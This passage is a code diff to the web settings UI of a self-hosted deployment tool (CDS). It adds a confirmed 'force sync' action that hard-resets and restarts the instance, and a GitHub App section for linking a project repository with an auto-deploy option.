     progress.style.display = 'block';
     progress.innerHTML = '';
-    status.textContent = '连接 /api/self-update …';
+    status.textContent = '连接 ' + endpoint + ' …';
 
     let resp;
     try {
-      resp = await fetch('/api/self-update', {
+      resp = await fetch(endpoint, {
         method: 'POST', credentials: 'same-origin',
         headers: { 'Content-Type': 'application/json' },
         body: JSON.stringify({ branch: target }),
@@ -338,12 +355,14 @@ async function cdsOpenSelfUpdate() {
     } catch (e) {
       status.innerHTML = '<span style="color:var(--red)">✗ ' + escapeHtml(e.message) + '</span>';
       goBtn.disabled = false;
+      forceBtn.disabled = false;
       goBtn.textContent = '重试';
       return;
     }
     if (!resp.ok) {
       status.innerHTML = '<span style="color:var(--red)">✗ HTTP ' + resp.status + '</span>';
       goBtn.disabled = false;
+      forceBtn.disabled = false;
       goBtn.textContent = '重试';
       return;
     }
@@ -372,23 +391,25 @@ async function cdsOpenSelfUpdate() {
           else if (line.startsWith('data: ')) {
             try {
               const d = JSON.parse(line.slice(6));
-              const label = d.step || curEvent;
               const title = d.title || d.message || '';
+              const stepLabel = d.step || curEvent;
               const color = d.status === 'done' ? 'var(--green)'
                 : d.status === 'error' ? 'var(--red)'
+                : d.status === 'warning' ? 'var(--amber,#f59e0b)'
                 : curEvent === 'done' ? 'var(--green)'
                 : curEvent === 'error' ? 'var(--red)'
                 : 'var(--text-secondary)';
-              progress.innerHTML += '<div style="color:' + color + '">[' + escapeHtml(label) + '] ' + escapeHtml(title) + '</div>';
+              progress.innerHTML += '<div style="color:' + color + '">[' + escapeHtml(stepLabel) + '] ' + escapeHtml(title) + '</div>';
               progress.scrollTop = progress.scrollHeight;
               if (curEvent === 'done') {
-                status.innerHTML = '<span style="color:var(--green)">✓ 更新已触发，CDS 正在重启… 5s 后自动刷新页面</span>';
+                status.innerHTML = '<span style="color:var(--green)">✓ ' + label + '已触发，CDS 正在重启… 5s 后自动刷新页面</span>';
                 done = true;
                 setTimeout(() => location.reload(), 5000);
               }
               if (curEvent === 'error') {
                 status.innerHTML = '<span style="color:var(--red)">✗ ' + escapeHtml(title) + '</span>';
                 goBtn.disabled = false;
+                forceBtn.disabled = false;
                 goBtn.textContent = '重试';
                 done = true;
               }
@@ -400,6 +421,14 @@ async function cdsOpenSelfUpdate() {
         break;
       }
     }
+  }
+
+  dlg.querySelector('#_plSuGo').onclick = () => runSelfSync('/api/self-update', '更新');
+  dlg.querySelector('#_plSuForce').onclick = () => {
+    if (!window.confirm(
+      '💥 强制同步会丢弃 host 上所有本地未推送的提交,硬重置到 origin/<当前选中分支>,再清 dist 缓存 + 重启。\n\n用于 self-update 的 git pull 合并错误导致代码没更新的场景。\n\n确定继续?'
+    )) return;
+    runSelfSync('/api/self-force-sync', '强制同步');
   };
 }
 

--- a/cds/web/settings.js
+++ b/cds/web/settings.js
@@ -394,8 +394,25 @@
   // instead of trying to embed the device modal here.
   function renderGithubTab() {
     contentEl.innerHTML =
+      // ── Section 1: GitHub App (Check Runs + auto deploy) ──
+      // Shown FIRST because this is the primary integration — push→preview.
+      // The older OAuth Device Flow section below only powers the "pick
+      // a repo when creating a project" UI, which is now optional once
+      // the App takes over repo selection.
+      '<div class="settings-section" id="ghAppSection">' +
+        '<div class="settings-section-title">GitHub 自动部署 (Check Runs)</div>' +
+        '<div class="settings-section-desc">' +
+          '安装 CDS GitHub App 后,<strong>本项目绑定到某个 GitHub 仓库</strong>,' +
+          'push 到该仓库时 CDS 会自动创建/刷新分支、跑部署,' +
+          '并把"CDS Deploy"结果回写到 PR 的 Checks 面板(点 Details 直达预览)。' +
+          '<br>Railway / Vercel 的体验,在你自己的 CDS 上复刻一份。' +
+        '</div>' +
+        '<div id="ghAppOverview" class="settings-placeholder">正在加载 GitHub App 状态…</div>' +
+        '<div id="ghAppProjectLink" style="margin-top:18px"></div>' +
+      '</div>' +
+      // ── Section 2: OAuth Device Flow (legacy repo picker) ──
       '<div class="settings-section">' +
-        '<div class="settings-section-title">GitHub 集成</div>' +
+        '<div class="settings-section-title">GitHub Device Flow 登录 (仓库选择器)</div>' +
         '<div class="settings-section-desc">' +
           '这是 <strong>系统级</strong> 设置。CDS 会使用这个 GitHub 账号拉取仓库列表,用于"从 GitHub 选择仓库"创建项目。<br>' +
           '采用 GitHub Device Flow —— 无需跳转回调 URL,任何部署方式都支持。' +
@@ -403,9 +420,9 @@
         '<div id="githubStatusBlock" class="settings-placeholder">正在加载 GitHub 状态…</div>' +
       '</div>' +
       '<div class="settings-section">' +
-        '<div class="settings-section-title">管理员配置</div>' +
+        '<div class="settings-section-title">管理员配置 (Device Flow)</div>' +
         '<div class="settings-section-desc">' +
-          '要启用 GitHub 集成,需要在 CDS 进程启动前设置环境变量:' +
+          '要启用 GitHub Device Flow,需要在 CDS 进程启动前设置环境变量:' +
         '</div>' +
         '<div style="background:var(--bg-card);border:1px solid var(--card-border);border-radius:9px;padding:14px;font-family:var(--font-mono,monospace);font-size:12px;color:var(--text-secondary);white-space:pre-wrap">' +
           'export CDS_GITHUB_CLIENT_ID="<your-oauth-app-client-id>"\n' +
@@ -422,6 +439,131 @@
         '</div>' +
       '</div>';
 
+    _renderGithubAppOverview();
+    _renderGithubDeviceFlowStatus();
+  }
+
+  // ── GitHub App overview + per-project link state ──
+  // Fetches /api/github/app + uses the already-loaded currentProject to
+  // render:
+  //   - App not configured → hint + docs link
+  //   - App configured + project unlinked → "绑定仓库" CTA
+  //   - App configured + project linked → repo info + autoDeploy toggle + 解除绑定
+  function _renderGithubAppOverview() {
+    var overview = document.getElementById('ghAppOverview');
+    if (!overview) return;
+    fetch('/api/github/app', { credentials: 'same-origin' })
+      .then(function (r) { return r.json(); })
+      .then(function (app) {
+        if (!app.configured) {
+          overview.style.textAlign = 'left';
+          overview.style.padding = '18px';
+          overview.innerHTML =
+            '<div style="display:flex;align-items:center;gap:10px;margin-bottom:10px">' +
+              '<span class="cds-clone-status error" style="display:inline-flex">未配置</span>' +
+              '<span style="font-size:12px;color:var(--text-secondary)">' +
+                '还没设置 CDS GitHub App 凭证。设完环境变量 + 重启 CDS 后会自动生效。' +
+              '</span>' +
+            '</div>' +
+            '<div style="background:var(--bg-card);border:1px solid var(--card-border);border-radius:9px;padding:14px;font-family:var(--font-mono,monospace);font-size:12px;color:var(--text-secondary);white-space:pre-wrap">' +
+              'export CDS_GITHUB_APP_ID="<numeric-app-id>"\n' +
+              'export CDS_GITHUB_APP_PRIVATE_KEY="$(cat private-key.pem)"\n' +
+              'export CDS_GITHUB_WEBHOOK_SECRET="<random-string>"\n' +
+              'export CDS_GITHUB_APP_SLUG="<lowercase-app-slug>"\n' +
+              'export CDS_PUBLIC_BASE_URL="https://cds.your-domain.com"' +
+            '</div>' +
+            '<div class="settings-section-desc" style="margin-top:12px">' +
+              '步骤: 在 <a href="https://github.com/settings/apps/new" target="_blank" rel="noopener" style="color:#60a5fa">GitHub → Settings → Developer settings → GitHub Apps → New GitHub App</a> 创建 App,' +
+              '授予 Checks / Contents / Metadata 权限,生成 private key,把上面 5 个环境变量写入 <code>.cds.env</code> 后重启 CDS。' +
+            '</div>';
+          document.getElementById('ghAppProjectLink').innerHTML = '';
+          return;
+        }
+
+        // Configured — show compact overview card.
+        overview.style.textAlign = 'left';
+        overview.style.padding = '18px';
+        var installBtn = app.installUrl
+          ? '<a href="' + escapeHtml(app.installUrl) + '" target="_blank" rel="noopener" class="settings-btn-outline" style="text-decoration:none;display:inline-flex">' +
+              '<svg width="14" height="14" viewBox="0 0 16 16" fill="currentColor" style="margin-right:6px"><path d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"/></svg>' +
+              '在 GitHub 上安装/管理 App' +
+            '</a>'
+          : '';
+        overview.innerHTML =
+          '<div style="display:flex;align-items:center;gap:10px;margin-bottom:14px">' +
+            '<span class="cds-clone-status ready">App 已配置</span>' +
+            (app.appSlug ? '<span style="font-size:12px;color:var(--text-secondary)">@' + escapeHtml(app.appSlug) + '</span>' : '') +
+          '</div>' +
+          '<div class="tfp-kv"><span class="tfp-kv-key">App ID</span><span class="tfp-kv-val mono">' + escapeHtml(app.appId || '-') + '</span></div>' +
+          (app.webhookUrl
+            ? '<div class="tfp-kv"><span class="tfp-kv-key">Webhook URL</span><span class="tfp-kv-val mono" style="word-break:break-all">' + escapeHtml(app.webhookUrl) + '</span></div>'
+            : '<div class="tfp-kv"><span class="tfp-kv-key">Webhook URL</span><span class="tfp-kv-val" style="color:var(--red)">未设置 CDS_PUBLIC_BASE_URL,GitHub 后台无法反查 URL</span></div>') +
+          (app.publicBaseUrl
+            ? '<div class="tfp-kv"><span class="tfp-kv-key">Public Base URL</span><span class="tfp-kv-val mono">' + escapeHtml(app.publicBaseUrl) + '</span></div>'
+            : '') +
+          '<div style="margin-top:14px">' + installBtn + '</div>';
+
+        // App is live — now render the per-project link card.
+        _renderGithubProjectLink();
+      })
+      .catch(function (err) {
+        overview.innerHTML = '<span style="color:var(--red)">加载失败: ' + escapeHtml(err && err.message ? err.message : String(err)) + '</span>';
+      });
+  }
+
+  // Render the "this project is linked to X / pick a repo" card.
+  // Depends on currentProject being loaded.
+  function _renderGithubProjectLink() {
+    var el = document.getElementById('ghAppProjectLink');
+    if (!el || !currentProject) return;
+    var p = currentProject;
+    var linked = Boolean(p.githubRepoFullName && p.githubInstallationId);
+
+    if (linked) {
+      var autoDeploy = p.githubAutoDeploy !== false; // default true
+      el.innerHTML =
+        '<div style="background:var(--bg-card);border:1px solid var(--card-border);border-radius:10px;padding:16px">' +
+          '<div style="display:flex;align-items:center;gap:10px;margin-bottom:14px">' +
+            '<span class="cds-clone-status ready">已绑定</span>' +
+            '<a href="https://github.com/' + escapeHtml(p.githubRepoFullName) + '" target="_blank" rel="noopener" style="color:#60a5fa;font-weight:600;font-size:14px;text-decoration:none">' +
+              escapeHtml(p.githubRepoFullName) +
+              ' <span style="opacity:0.6">↗</span>' +
+            '</a>' +
+          '</div>' +
+          '<div class="tfp-kv"><span class="tfp-kv-key">Installation ID</span><span class="tfp-kv-val mono">' + escapeHtml(String(p.githubInstallationId)) + '</span></div>' +
+          (p.githubLinkedAt
+            ? '<div class="tfp-kv"><span class="tfp-kv-key">绑定于</span><span class="tfp-kv-val">' + escapeHtml(new Date(p.githubLinkedAt).toLocaleString()) + '</span></div>'
+            : '') +
+          '<div style="display:flex;align-items:center;gap:10px;margin-top:16px;padding:12px;background:var(--bg-elevated);border-radius:8px">' +
+            '<label style="flex:1;display:flex;align-items:center;gap:10px;cursor:pointer">' +
+              '<input type="checkbox" id="ghAutoDeployToggle" ' + (autoDeploy ? 'checked' : '') + ' onchange="_settingsToggleAutoDeploy(this.checked)" style="width:16px;height:16px;cursor:pointer">' +
+              '<div>' +
+                '<div style="font-weight:600;font-size:13px;color:var(--text-primary)">自动部署</div>' +
+                '<div style="font-size:11px;color:var(--text-muted);margin-top:2px">push 到该仓库时自动在 CDS 构建部署</div>' +
+              '</div>' +
+            '</label>' +
+          '</div>' +
+          '<div style="display:flex;gap:10px;margin-top:16px">' +
+            '<button type="button" class="settings-btn-outline" onclick="_settingsGithubRelink()">重新绑定其他仓库</button>' +
+            '<button type="button" class="settings-btn-outline settings-btn-danger" onclick="_settingsGithubUnlink()">解除绑定</button>' +
+          '</div>' +
+        '</div>';
+    } else {
+      el.innerHTML =
+        '<div style="background:var(--bg-card);border:1px solid var(--card-border);border-radius:10px;padding:18px;text-align:center">' +
+          '<div style="font-size:13px;color:var(--text-secondary);margin-bottom:14px">' +
+            '本项目还没有绑定 GitHub 仓库。绑定后 push 会自动触发部署。' +
+          '</div>' +
+          '<button type="button" class="settings-btn-primary" onclick="_settingsGithubLinkOpen()">' +
+            '<svg width="14" height="14" viewBox="0 0 16 16" fill="currentColor" style="margin-right:6px"><path d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"/></svg>' +
+            '绑定 GitHub 仓库' +
+          '</button>' +
+        '</div>';
+    }
+  }
+
+  // Extracted: load Device Flow status into the original #githubStatusBlock.
+  function _renderGithubDeviceFlowStatus() {
     // Fetch status and render the appropriate state
     fetch('/api/github/oauth/status', { credentials: 'same-origin' })
       .then(function (r) { return r.json(); })
@@ -584,6 +726,296 @@
       })
       .catch(function (err) {
         showToast('断开失败: ' + (err && err.message ? err.message : err));
+      });
+  };
+
+  // ── GitHub App link handlers ──
+
+  // Toggle autoDeploy on an already-linked project. Hits the same
+  // POST /github/link endpoint with existing installationId + repoFullName
+  // so the backend treats this as an idempotent "relink with same target,
+  // different autoDeploy". A PATCH alternative would be cleaner; kept as
+  // POST for backend simplicity.
+  window._settingsToggleAutoDeploy = function (enabled) {
+    if (!currentProject || !currentProject.githubInstallationId || !currentProject.githubRepoFullName) {
+      showToast('请先绑定仓库');
+      return;
+    }
+    fetch('/api/projects/' + encodeURIComponent(CURRENT_PROJECT_ID) + '/github/link', {
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json' },
+      credentials: 'same-origin',
+      body: JSON.stringify({
+        installationId: currentProject.githubInstallationId,
+        repoFullName: currentProject.githubRepoFullName,
+        autoDeploy: Boolean(enabled),
+      }),
+    })
+      .then(function (r) {
+        return r.json().then(function (body) { return { status: r.status, body: body }; });
+      })
+      .then(function (result) {
+        if (result.status !== 200) {
+          showToast('更新失败: ' + (result.body && result.body.message || '未知错误'));
+          var cb = document.getElementById('ghAutoDeployToggle');
+          if (cb) cb.checked = !enabled;
+          return;
+        }
+        currentProject = result.body.project;
+        showToast(enabled ? '已启用自动部署' : '已禁用自动部署');
+      })
+      .catch(function (err) {
+        showToast('更新失败: ' + (err && err.message ? err.message : err));
+        var cb = document.getElementById('ghAutoDeployToggle');
+        if (cb) cb.checked = !enabled;
+      });
+  };
+
+  window._settingsGithubUnlink = function () {
+    if (!window.confirm('确定解除本项目的 GitHub 仓库绑定吗？\n\npush 将不再自动部署。之前已创建的分支和 check run 不受影响。')) return;
+    fetch('/api/projects/' + encodeURIComponent(CURRENT_PROJECT_ID) + '/github/link', {
+      method: 'DELETE',
+      credentials: 'same-origin',
+    })
+      .then(function (r) { return r.json(); })
+      .then(function () {
+        showToast('已解除绑定');
+        loadProject().then(function (p) {
+          currentProject = p;
+          renderGithubTab();
+        });
+      })
+      .catch(function (err) {
+        showToast('解除失败: ' + (err && err.message ? err.message : err));
+      });
+  };
+
+  window._settingsGithubRelink = function () {
+    // Relink = unlink + open picker. We don't ask confirmation twice
+    // because the picker itself is the confirmation step.
+    fetch('/api/projects/' + encodeURIComponent(CURRENT_PROJECT_ID) + '/github/link', {
+      method: 'DELETE',
+      credentials: 'same-origin',
+    })
+      .then(function () {
+        return loadProject();
+      })
+      .then(function (p) {
+        currentProject = p;
+        _settingsGithubLinkOpen();
+      })
+      .catch(function (err) {
+        showToast('重置失败: ' + (err && err.message ? err.message : err));
+      });
+  };
+
+  // ── Repo picker modal ──
+  // Creates a dynamic overlay with two steps:
+  //   Step 1: pick an installation (list comes from /api/github/installations)
+  //   Step 2: pick a repo from that installation
+  // The modal renders in-place inside document.body (no preset HTML slot)
+  // so the settings.html stays untouched.
+  var _linkModalEl = null;
+
+  function _closeLinkModal() {
+    if (_linkModalEl && _linkModalEl.parentNode) {
+      _linkModalEl.parentNode.removeChild(_linkModalEl);
+    }
+    _linkModalEl = null;
+  }
+
+  window._settingsGithubLinkOpen = function () {
+    _closeLinkModal();
+    var overlay = document.createElement('div');
+    overlay.style.cssText = 'position:fixed;inset:0;background:rgba(0,0,0,0.55);z-index:10001;display:flex;align-items:center;justify-content:center;padding:20px';
+    overlay.addEventListener('click', function (e) { if (e.target === overlay) _closeLinkModal(); });
+
+    var modal = document.createElement('div');
+    modal.style.cssText = 'background:var(--bg-primary);border:1px solid var(--card-border);border-radius:14px;padding:24px;width:100%;max-width:560px;max-height:80vh;overflow-y:auto;box-shadow:0 24px 60px rgba(0,0,0,0.6)';
+    modal.innerHTML =
+      '<div style="display:flex;align-items:center;justify-content:space-between;margin-bottom:18px">' +
+        '<div style="font-size:18px;font-weight:700;color:var(--text-primary)">绑定 GitHub 仓库</div>' +
+        '<button type="button" onclick="_settingsGithubLinkClose()" style="background:none;border:none;color:var(--text-muted);cursor:pointer;font-size:18px;padding:4px">✕</button>' +
+      '</div>' +
+      '<div id="ghLinkStep" style="min-height:200px">' +
+        '<div class="settings-placeholder" style="padding:40px 20px">正在加载安装列表…</div>' +
+      '</div>';
+    overlay.appendChild(modal);
+    document.body.appendChild(overlay);
+    _linkModalEl = overlay;
+
+    // Step 1: load installations
+    fetch('/api/github/installations', { credentials: 'same-origin' })
+      .then(function (r) {
+        return r.json().then(function (body) { return { status: r.status, body: body }; });
+      })
+      .then(function (result) {
+        var step = document.getElementById('ghLinkStep');
+        if (!step) return;
+        if (result.status !== 200) {
+          step.innerHTML = '<div style="padding:20px;color:var(--red)">拉取安装失败: ' + escapeHtml((result.body && result.body.message) || 'HTTP ' + result.status) + '</div>';
+          return;
+        }
+        var installs = (result.body && result.body.installations) || [];
+        if (installs.length === 0) {
+          step.innerHTML =
+            '<div style="padding:20px;text-align:center">' +
+              '<div style="font-size:14px;color:var(--text-secondary);margin-bottom:14px">' +
+                '还没有任何 GitHub 账号/组织安装了本 App。' +
+              '</div>' +
+              '<a href="#" onclick="(async()=>{const r=await fetch(\'/api/github/app\',{credentials:\'same-origin\'}).then(x=>x.json());if(r.installUrl)window.open(r.installUrl,\'_blank\')})();return false" class="settings-btn-primary" style="text-decoration:none">在 GitHub 上安装 App</a>' +
+            '</div>';
+          return;
+        }
+
+        var options = installs.map(function (inst) {
+          var avatar = inst.account.avatarUrl
+            ? '<img src="' + escapeHtml(inst.account.avatarUrl) + '" width="28" height="28" style="border-radius:50%">'
+            : '<div style="width:28px;height:28px;border-radius:50%;background:var(--bg-elevated)"></div>';
+          return (
+            '<button type="button" class="gh-link-item" ' +
+              'onclick="_settingsPickInstallation(' + inst.id + ',\'' + escapeHtml(inst.account.login).replace(/'/g, '&#39;') + '\')" ' +
+              'style="display:flex;align-items:center;gap:12px;width:100%;padding:12px;background:var(--bg-card);border:1px solid var(--card-border);border-radius:10px;cursor:pointer;transition:border-color 120ms;text-align:left;font-family:inherit">' +
+              avatar +
+              '<div style="flex:1">' +
+                '<div style="font-weight:600;font-size:13px;color:var(--text-primary)">' + escapeHtml(inst.account.login) + '</div>' +
+                '<div style="font-size:11px;color:var(--text-muted);margin-top:2px">' +
+                  escapeHtml(inst.account.type || 'Unknown') + ' · ' +
+                  (inst.repositorySelection === 'all' ? '所有仓库' : '指定仓库') + ' · id=' + inst.id +
+                '</div>' +
+              '</div>' +
+              '<span style="color:var(--text-muted)">›</span>' +
+            '</button>'
+          );
+        }).join('');
+
+        step.innerHTML =
+          '<div style="font-size:12px;color:var(--text-muted);margin-bottom:12px">' +
+            '选择一个已安装本 App 的 GitHub 账号或组织:' +
+          '</div>' +
+          '<div style="display:flex;flex-direction:column;gap:8px">' + options + '</div>';
+      })
+      .catch(function (err) {
+        var step = document.getElementById('ghLinkStep');
+        if (step) step.innerHTML = '<div style="padding:20px;color:var(--red)">网络错误: ' + escapeHtml(err && err.message ? err.message : String(err)) + '</div>';
+      });
+  };
+
+  window._settingsGithubLinkClose = _closeLinkModal;
+
+  // Step 2: after picking an installation, list repos.
+  window._settingsPickInstallation = function (installationId, ownerLogin) {
+    var step = document.getElementById('ghLinkStep');
+    if (step) step.innerHTML = '<div class="settings-placeholder" style="padding:40px 20px">正在加载 @' + escapeHtml(ownerLogin) + ' 下的仓库…</div>';
+
+    fetch('/api/github/installations/' + installationId + '/repos', { credentials: 'same-origin' })
+      .then(function (r) { return r.json().then(function (body) { return { status: r.status, body: body }; }); })
+      .then(function (result) {
+        step = document.getElementById('ghLinkStep');
+        if (!step) return;
+        if (result.status !== 200) {
+          step.innerHTML = '<div style="padding:20px;color:var(--red)">拉取仓库失败: ' + escapeHtml((result.body && result.body.message) || 'HTTP ' + result.status) + '</div>';
+          return;
+        }
+        var repos = (result.body && result.body.repos) || [];
+        if (repos.length === 0) {
+          step.innerHTML =
+            '<div style="padding:20px;text-align:center">' +
+              '<div style="font-size:14px;color:var(--text-secondary);margin-bottom:14px">@' + escapeHtml(ownerLogin) + ' 没有授予本 App 访问任何仓库</div>' +
+              '<button type="button" class="settings-btn-outline" onclick="_settingsGithubLinkOpen()">返回重选</button>' +
+            '</div>';
+          return;
+        }
+
+        var options = repos.map(function (repo) {
+          return (
+            '<button type="button" class="gh-link-item" ' +
+              'onclick="_settingsPickRepo(' + installationId + ',\'' + escapeHtml(repo.fullName).replace(/'/g, '&#39;') + '\')" ' +
+              'style="display:flex;align-items:center;gap:10px;width:100%;padding:11px 12px;background:var(--bg-card);border:1px solid var(--card-border);border-radius:10px;cursor:pointer;transition:border-color 120ms;text-align:left;font-family:inherit">' +
+              '<svg width="14" height="14" viewBox="0 0 16 16" fill="currentColor" style="color:var(--text-muted);flex-shrink:0"><path d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 010-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"/></svg>' +
+              '<div style="flex:1;min-width:0">' +
+                '<div style="font-weight:600;font-size:13px;color:var(--text-primary);display:flex;align-items:center;gap:6px">' +
+                  escapeHtml(repo.fullName) +
+                  (repo.private ? '<span style="font-size:10px;padding:1px 6px;border:1px solid var(--card-border);border-radius:10px;color:var(--text-muted);font-weight:500">Private</span>' : '') +
+                '</div>' +
+                (repo.defaultBranch ? '<div style="font-size:11px;color:var(--text-muted);margin-top:2px">默认分支: ' + escapeHtml(repo.defaultBranch) + '</div>' : '') +
+              '</div>' +
+              '<span style="color:var(--text-muted)">›</span>' +
+            '</button>'
+          );
+        }).join('');
+
+        step.innerHTML =
+          '<div style="display:flex;align-items:center;gap:8px;font-size:12px;color:var(--text-muted);margin-bottom:12px">' +
+            '<button type="button" onclick="_settingsGithubLinkOpen()" style="background:none;border:none;color:#60a5fa;cursor:pointer;font-size:12px;padding:0">‹ 返回</button>' +
+            '<span>/ @' + escapeHtml(ownerLogin) + ' 下选一个仓库:</span>' +
+          '</div>' +
+          '<div style="display:flex;flex-direction:column;gap:6px">' + options + '</div>';
+      })
+      .catch(function (err) {
+        var step = document.getElementById('ghLinkStep');
+        if (step) step.innerHTML = '<div style="padding:20px;color:var(--red)">网络错误: ' + escapeHtml(err && err.message ? err.message : String(err)) + '</div>';
+      });
+  };
+
+  // Step 3: confirm + POST /link
+  window._settingsPickRepo = function (installationId, repoFullName) {
+    var step = document.getElementById('ghLinkStep');
+    if (step) {
+      step.innerHTML =
+        '<div style="padding:16px">' +
+          '<div style="font-size:13px;color:var(--text-secondary);margin-bottom:16px">' +
+            '把本项目绑定到 <strong style="color:var(--text-primary)">' + escapeHtml(repoFullName) + '</strong>' +
+          '</div>' +
+          '<label style="display:flex;align-items:center;gap:10px;padding:12px;background:var(--bg-elevated);border-radius:8px;cursor:pointer;margin-bottom:18px">' +
+            '<input type="checkbox" id="ghLinkAutoDeploy" checked style="width:16px;height:16px;cursor:pointer">' +
+            '<div>' +
+              '<div style="font-weight:600;font-size:13px;color:var(--text-primary)">开启自动部署</div>' +
+              '<div style="font-size:11px;color:var(--text-muted);margin-top:2px">push 到该仓库任意分支时自动在 CDS 构建部署(推荐)</div>' +
+            '</div>' +
+          '</label>' +
+          '<div style="display:flex;gap:10px;justify-content:flex-end">' +
+            '<button type="button" class="settings-btn-outline" onclick="_settingsGithubLinkOpen()">上一步</button>' +
+            '<button type="button" class="settings-btn-primary" id="ghLinkConfirmBtn" ' +
+              'onclick="_settingsConfirmLink(' + installationId + ',\'' + escapeHtml(repoFullName).replace(/'/g, '&#39;') + '\')">' +
+              '确认绑定' +
+            '</button>' +
+          '</div>' +
+        '</div>';
+    }
+  };
+
+  window._settingsConfirmLink = function (installationId, repoFullName) {
+    var btn = document.getElementById('ghLinkConfirmBtn');
+    var autoEl = document.getElementById('ghLinkAutoDeploy');
+    var autoDeploy = autoEl ? autoEl.checked : true;
+    if (btn) { btn.disabled = true; btn.textContent = '绑定中…'; }
+
+    fetch('/api/projects/' + encodeURIComponent(CURRENT_PROJECT_ID) + '/github/link', {
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json' },
+      credentials: 'same-origin',
+      body: JSON.stringify({
+        installationId: installationId,
+        repoFullName: repoFullName,
+        autoDeploy: autoDeploy,
+      }),
+    })
+      .then(function (r) { return r.json().then(function (body) { return { status: r.status, body: body }; }); })
+      .then(function (result) {
+        if (result.status !== 200) {
+          if (btn) { btn.disabled = false; btn.textContent = '确认绑定'; }
+          showToast('绑定失败: ' + ((result.body && result.body.message) || 'HTTP ' + result.status));
+          return;
+        }
+        showToast('已绑定 ' + repoFullName);
+        _closeLinkModal();
+        currentProject = result.body.project;
+        renderGithubTab();
+      })
+      .catch(function (err) {
+        if (btn) { btn.disabled = false; btn.textContent = '确认绑定'; }
+        showToast('网络错误: ' + (err && err.message ? err.message : err));
       });
   };
 

--- a/cds/web/settings.js
+++ b/cds/web/settings.js
@@ -1023,6 +1023,26 @@
     var p = currentProject;
     var canDelete = !p.legacyFlag;
     contentEl.innerHTML =
+      // ── CDS self-recovery (admin-level, not project-scoped) ──
+      '<div class="settings-section">' +
+        '<div class="settings-section-title" style="color:var(--amber,#f59e0b)">CDS 自维护</div>' +
+        '<div class="settings-section-desc">这些操作影响整个 CDS 实例,会在几秒内让管理面板短暂不可用。</div>' +
+        '<div style="background:var(--bg-card);border:1px solid rgba(245,158,11,0.3);border-radius:10px;padding:18px;margin-bottom:14px">' +
+          '<div style="font-weight:700;color:var(--text-primary);margin-bottom:6px">强制同步 CDS 源码到 origin</div>' +
+          '<div style="font-size:12px;color:var(--text-muted);margin-bottom:14px;line-height:1.6">' +
+            '当 self-update 的 git pull 把远端改动合并掉、CDS 运行的仍是旧代码时,用这个强制命令:' +
+            '<code>git fetch + git reset --hard origin/&lt;branch&gt; + 清 dist 缓存 + 重启</code>。' +
+            '<br>⚠ 会丢弃 host 上本地未推送的提交。正常部署场景下不会有本地提交,所以是安全的。' +
+          '</div>' +
+          '<div style="display:flex;gap:10px;align-items:center">' +
+            '<input type="text" id="sfsBranch" placeholder="分支名 (留空 = 当前分支)" ' +
+              'style="flex:1;background:var(--bg-elevated);border:1px solid var(--card-border);border-radius:8px;padding:8px 12px;color:var(--text-primary);font-family:var(--font-mono,monospace);font-size:12px">' +
+            '<button type="button" class="settings-btn-outline" style="color:var(--amber,#f59e0b);border-color:rgba(245,158,11,0.4)" onclick="_settingsForceSync()">强制同步</button>' +
+          '</div>' +
+          '<div id="sfsProgress" style="margin-top:14px;font-size:12px;color:var(--text-muted);font-family:var(--font-mono,monospace);white-space:pre-wrap;max-height:240px;overflow-y:auto;line-height:1.5"></div>' +
+        '</div>' +
+      '</div>' +
+      // ── Project deletion (original danger zone) ──
       '<div class="settings-section">' +
         '<div class="settings-section-title" style="color:var(--red,#f43f5e)">危险区</div>' +
         '<div class="settings-section-desc">这些操作不可撤销。请谨慎。</div>' +
@@ -1037,6 +1057,104 @@
         '</div>' +
       '</div>';
   }
+
+  // Force-sync the CDS source repo to origin. Calls POST /api/self-force-sync
+  // and streams the SSE progress events into the preview box. Equivalent to
+  // SSH-ing in and running `git reset --hard + rm dist/.build-sha + restart`
+  // but 100% in-UI.
+  window._settingsForceSync = function () {
+    var inp = document.getElementById('sfsBranch');
+    var progress = document.getElementById('sfsProgress');
+    var branch = inp && inp.value ? inp.value.trim() : '';
+    if (!window.confirm(
+      '确认强制同步 CDS 源码到 origin/' + (branch || '<当前分支>') + '?\n\n' +
+      '会硬重置 host 上的 /root/…/prd_agent, 清 dist 缓存, 然后重启 CDS。\n' +
